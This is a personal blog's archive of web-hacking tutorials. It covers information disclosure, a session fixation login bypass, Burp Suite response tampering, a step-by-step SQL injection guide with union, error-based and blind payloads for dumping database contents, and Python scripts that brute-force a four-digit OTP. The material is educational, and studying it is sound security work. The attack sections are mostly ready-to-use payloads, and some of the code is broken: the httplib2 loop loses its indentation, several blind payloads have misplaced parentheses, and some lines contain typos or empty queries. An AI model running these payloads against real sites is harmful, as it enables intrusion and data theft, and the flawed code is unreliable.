이 블로그 검색

레이블이 Web Security인 게시물을 표시합니다. 모든 게시물 표시
레이블이 Web Security인 게시물을 표시합니다. 모든 게시물 표시

2023년 9월 2일 토요일

What is Information Disclosure

Definition

Unnecessary information exposure, also known as Information Disclosure, refers to security vulnerabilities where information that should not be exposed to users or systems in web services is disclosed to external parties.

Vulnerability Points

  • Error pages, HTTP request and response pages

Vulnerability Validation Methods

  • For error pages, HTTP request, and response headers, check if version information is visible using Burp Suite.
  • Verify if important information commented in web pages is exposed in the web page source.
  • Check if excessive information is exposed in error messages or error pages.
  • Confirm if encoded important information can be decoded.

Attack Methods

Attack Scenarios

  1. Information exposure using error messages: Attackers extract sensitive information such as debug information or paths from error messages.
  2. Information exposure using XSS (Cross-Site Scripting): Attackers trick users into accessing the password change page, inadvertently revealing their previous password, which the attacker then captures.

Occurrence Process



Countermeasures

  1. Configure not to return detailed error messages with debug and exception information.
  2. Implement error handling mechanisms to prevent exposing exception information to users.
  3. Take measures not to store sensitive information in log files.
  4. Restrict access to the web service's directory structure and file lists.
  5. Apply security measures to web application configuration files and database connection information.

2023년 8월 16일 수요일

Web Hacking Practice: Session Fixation Attack

Login Screen

Login Attempt Request

Login Complete

The above website issues a session before login and verifies the ID and password received during the login attempt request.

In other words, the website follows this flow: Issuing a session ID (unauthenticated) → Login authentication → Using the authenticated session ID. Therefore, it is possible to bypass the login process.

Fake Login Attempt

By using Burp Suite's Repeater, the ID is changed to "admin" in the request and sent. Naturally, the response will be "fail," but since the user ID on the server-side has already been changed during the authentication process, and the session ID is already authenticated, resending the request from the "Login Complete" state will result in being logged in and the ID will be changed.







2023년 7월 22일 토요일

How to Tamper Response in Burp Suite

Response Tampering

There are two methods to tamper with responses using Burp Suite:

  1. Modify the response code after intercepting the response.
  2. Set up proxy settings to intercept specific codes and replace them with different content.

Modifying the response code after intercepting:

  1. Open the browser with proxy intercept enabled.
  2. Navigate to the desired website using the opened browser.
  3. Turn on intercept by clicking "Intercept is off" and changing it to "Intercept is on."
  4. The request will pause until you click "Forward" after intercepting it.
  5. When it's paused, right-click and select "Do intercept-response to this request."
  6. After modifying the response, click "Forward" to see the changes in the Chromium browser.
  7. You can either modify the response and click "Forward" or turn off intercept to proceed.

Setting up proxy rules for response code manipulation:

  1. Go to Proxy > Options > Match and Replace Rules.
  2. Click "Add" to create a new rule.
  3. Select "Response Body" for the type.
  4. Enter <script>location.href='./example.php';</script> in the "Match" field.
  5. Leave the "Replace" field empty, as we want to remove the code <script>location.href='./example.php';</script>.
  6. Click "OK" to add the rule, and it will be applied to all future responses' body parts that contain the specified code.

2023년 5월 10일 수요일

Web Hacking: SQL injection

Definition

SQL injection is a technique where malicious SQL queries are inserted to attack a database system, allowing for data extraction, tampering, authentication bypass, and more.

Pre-Attack Checklist

SQL Injection Data Extraction Process

  • Deduction

    • Does the system perform identification and authentication together or separately?

    • What type of attack method is likely to work?

    • How will the query likely end? If it's a search query, '%search term%' is highly likely to be used.

  • Vulnerability Check

    • If a vulnerability is found, how far does it go?

    • If SQL injection is possible, is it a union-based, error-based, or blind attack?

  • Select SQL Query

    • Union SQL injection

    • Error-based SQL injection

    • Blind SQL injection

  • Identify Data Output Locations

  • Choose SQL Injection to Use

  • Obtain DB, Table, and Column Names

  • Extract Data

Types of SQL Injection

Union-Based SQL Injection

  • Used when results are displayed on the screen, such as on a bulletin board.

  • ex) general forum, bulletin board

  1. Deduce the end of the search query.

    3+4 
    # If only 7 is returned in the search, the SQL query will work. Additionally, you can determine whether the % sign was used depending on whether only 7 is returned or if 7 is included in the results.
  2. Check if SQL injection is possible.

    %' and '1%'='1 # true
    %' and '1%'='2 # false
  3. Determine how many columns are used in the search.

    Increase the column count from 1 to 4 and check.

    %' order by 1 and '1%'='1
  4. Check if union works and identify the data output location.

    %' union select '1','2','3','4' and '1%'='1
  5. Check the database name.

    MySQL

    %' union select '1',database(),'3','4' and '1%'='1
  6. Check the table name.

    MySQL

    %' union select '1',table_name,'3','4' from information_schema.tables where table_schema = database() and '1%'='1
  7. Check column names.

    MySQL

    %' union select '1',column_name,'3','4' from information_schema.columns where table_name='table_name' and '1%'='1
  8. Extract data.

    %' union select '1',column_name,'3','4' from table_naem WHERE '1%' LIKE '1

Error-Based SQL Injection

  • Used when error messages can be checked.

  • Logical Error

  1. Verify that the error message is a DB error.

    Typically uses updatexml or extractvalue.

    A syntax error (logical error) is displayed due to the concat command ':test'.

    1' and updatexml(null,concat(0x3a,(select 'test')),null) and '1'='1
    1' and extractvalue(1,concat(0x3a,(select 'test'))) and '1'='1
  2. Set the base for the error message.

    1' and updatexml(null,concat(0x3a,(sql)),null) and '1'='1
  3. Check the database name.

    MySQL

    select database()
    1' and updatexml(null,concat(0x3a,(select database())),null) and '1'='1
  4. Check the table name.

    MySQL

    select table_name from information_schema.tables where table_schema = 'db_name' limit 1,1
    1' and updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema = 'db_name' limit 1,1)),null) and '1'='1
  5. Check column names.

    limit [starting point],[how many]

    select column_name from information_schema.columns where table_name='table_name' limit 0,1
    1' and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_name='table_name' limit 0,1)),null) and '1'='1
  6. Extract data.

    select column_name from table_name limit 0,1
    1' and updatexml(null,concat(0x3a,(select column_name from table_name limit 0,1)),null) and '1'='1

Blind SQL Injection

  • Used in places where DB results are not displayed on the screen.

  • Anywhere with a response that differs depending on a true or false condition can be used.

  1. Check if SQL injection is possible 1.-expected success

    %' and (1=1) and '1%'='1
  2. Check if SQL injection is possible 2.-expected fail

    %' and (1=2) and '1%'='1
  3. Check if the SQL injection select statement works.

    %' and (select 'test'='test') and '1%'='1
  4. Create an attack format.

    %' and (sql) and '1%'='1
  5. Check if ascii works.

    ascii('t')>0
    %' and (ascii('t')>0) and '1%'='1
  6. Check if substring works.

    ascii(substring('test',1,1))>0
    %' and (ascii(substring('test'),1,1)>0) and '1%'='1
    1. Create a second attack format.

    %' and (ascii(substring((sql),1,1))>0) and '1%'='1
    1. Retrieve the DB.

    select database()
    %' and (ascii(substring(select database()),1,1)>0) and '1%'='1
    1. Retrieve the table name.

    SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1 # retrieves only the first table name in the DB.
    SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1 # retrieves only the second table name in the DB.
    %' and (ascii(substring(SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1)>0) and '1%'='1
    1. Retrieve the column name.

    SELECT column_name FROM information_schema.columns WHERE table_name = 'table_name' LIMIT 0,1
    %' and (ascii(substring(SELECT column_name FROM information_schema.columns WHERE table_name = 'table_name' LIMIT 0,1),1,1)>0) and '1%'='1
    1. Extract data.

    select from limit 0,1
    %' and (ascii(substring(sql),1,1)>0) and '1%'='1

2023년 4월 11일 화요일

Understanding the Key Features of Burp Suite

Burp Suite

Definition

Burp Suite is a web proxy program (packet manipulation program) that sits between the client and the server.

It allows interception of data being sent between the two and provides various tools such as vulnerability scanners and interface analysis tools for web applications.

Usage

  • Detecting vulnerabilities in web applications

  • Fixing security flaws

  • Analyzing web application interfaces

Installation on Ubuntu

  1. Install Java

    sudo apt-get install openjdk-8-jre
    
  2. Download Burp Suite Community edition

    https://portswigger.net/burp/communitydownload

  3. Run the installation file

    Open the terminal in the download folder

    sudo bash burpsuite_community_linux_v2021_9_1.sh
    
  4. Run Burp Suite

    Go to /usr/local/bin, the default installation location, and run Burp Suite from the terminal

    /BurpSuiteCommunity
    

Key Features of Burp Suite

Intercept

Definition

One of the features of Burp Suite allows you to stop requests being sent to the server. You can modify the packet in the middle and send it.

Steps

  1. Turn on proxy-intercept-intercept

  2. Open the browser

All requests made by the opened Chromium browser will be stopped in the middle, and cannot be sent without permission from Burp Suite.

  • Forward: Sends the stopped request to the server. You can modify the request before sending it.

  • Drop: Deletes the stopped request. The server does not receive this request.

History

Definition

One of the features of Burp Suite allows you to see all requests and responses made in the Chromium browser.

Steps

  1. proxy-intercept-HTTP history

  2. Open the browser

You can view all requests and responses made in the opened Chromium browser.

Repeater

Definition

One of the features of Burp Suite allows you to send a request multiple times with modifications to the server and see the response immediately after sending.

Steps

  1. proxy-intercept-HTTP history-Select the request you want to repeat-Right-click-Send to Repeater

  2. Modify the request and click "Send" to see the response

Intruder

Definition

One of the features of Burp Suite allows you to brute force passwords by sending repeated requests.

Steps

  1. proxy-intercept-HTTP history-Select the request you want to repeat-Right-click-Send to Intruder

  2. position-clear-select the part you want to modify repeatedly-Add

  3. payload-Set how to modify the selected part

  4. Start attack

The attack speed is a bit slow and you have to search from predefined places, so if you need complex conditions, it is better to write and attack separately with Python.

If you use Python libraries such as httplib2 or requests, you can replace the Intruder function.

Python Example

HTTP request: GET example.php?otp_num=1111 HTTP/1.1

Variable: otp_num

Range of attempts: 0000~9999

Condition: Success

import httplib2

# Target website URL (here: example.com)
url = "<https://example.com/example.php>"

# Create an httplib2 instance
http_obj = httplib2.Http()

# Range of otp_num (0000 to 9999)
for otp_num in range(10000):
    # Format otp_num as a 4-digit number (e.g., 0035)
otp_num_formatted = f"{otp_num:04d}"

# Add otp_num parameter to GET request
request_url = f"{url}?otp_num={otp_num_formatted}"
response, content = http_obj.request(request_url, method="GET")

# You can modify the processing depending on how you want to find the desired result.
# For example, if the server returns a specific message, you can check it.
if b"Success" in content:
    print(f"Success! OTP number is: {otp_num_formatted}")
    break
else:
    print(f"Failed for OTP number: {otp_num_formatted}")
import requests

# Target website URL (here: example.com)
url = "<https://example.com/example.php>"

# Range of otp_num (0000 to 9999)
for otp_num in range(10000):
    # Format otp_num as a 4-digit number (e.g., 0035)
    otp_num_formatted = f"{otp_num:04d}"

    # Add otp_num parameter to GET request
    response = requests.get(url, params={"otp_num": otp_num_formatted})

    # You can modify the processing depending on how you want to find the desired result.
    # For example, if the server returns a specific message, you can check it.
    if "Success" in response.text:
        print(f"Success! OTP number is: {otp_num_formatted}")
        break
    else:
        print(f"Failed for OTP number: {otp_num_formatted}")

Logic Gate Truth Tables & Definitions

Logic Gate Truth Tables Java Code !A // NOT A&B // AND ~(A&B) // NAND A|B // OR ~(A|B) // XOR A^B // XOR ~(A^B) // XNOR ~A // Inve...